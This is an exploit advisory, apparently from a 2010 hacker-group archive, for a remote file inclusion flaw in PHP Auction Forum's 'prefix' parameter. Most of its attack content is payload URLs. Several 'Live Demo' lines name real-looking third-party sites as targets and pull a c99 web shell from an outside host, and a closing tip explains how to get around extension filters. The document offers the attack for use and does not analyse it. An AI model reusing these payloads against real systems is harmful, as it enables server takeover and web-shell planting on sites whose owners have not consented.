PHP Auction Forum suffers from a remote file inclusion vulnerability.
ac98011a2760c40d4328538b1cd3c44dc0c95504915238dff1f996c1710fb7f4
=====================================================
PHP AUCTION FORUM ( prefix ) Remote File Include Exploit
=====================================================
[~]===========================================================================[~]
[~] Archive : PHP AUCTION FORUM ( prefix ) Remote File Include Exploit
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 15 Oktober, 2010
[~]===========================================================================[~]
#######################################################################################################################################
##
##.___ .___ .__ _________ .___
##| | ____ __| _/ ____ ____ ____ ______|__|_____ ____ \_ ___ \ ____ __| _/ ____ _______
##| | / \ / __ | / _ \ / \ _/ __ \ / ___/| |\__ \ / \ / \ \/ / _ \ / __ | _/ __ \ \_ __ \
##| || | \/ /_/ | ( <_> )| | \\ ___/ \___ \ | | / __ \_| | \\ \____( <_> )/ /_/ | \ ___/ | | \/
##|___||___| /\____ | \____/ |___| / \___ >/____ >|__|(____ /|___| / \______ / \____/ \____ | \___ > |__|
## \/ \/ \/ \/ \/ \/ \/ \/ \/ \/
##
## Exploit By jos_ali_joe Indonesian Coder Team[at]2010. Mail : josalijoe@yahoo.com
##
########################################################################################################################################
########################################################################################################################################
---------------------------------------------------------------------------
[$] ExPLo!T : http://example.com//?prefix=[ Indonesian Coder ]
[#] Live Demo : http://wolfscps.com//?prefix=http://web-shell.hit.bg/c99shell.txt mv idc.php
[#] Live Demo : http://www.greatamericanbids.com//?prefix=http://web-shell.hit.bg/c99shell.txt mv idc.php
[#] Live Demo : http://blackharleyownersgroup.com//?prefix=http://web-shell.hit.bg/c99shell.txt mv idc.php
---------------------------------------------------------------------------
Note : if not able to inject with. txt
in add [ mv your.php ] or up to you with the extension [ .php ]
Enjoy aja yo kang
Greets For : /Indonesian Coder Team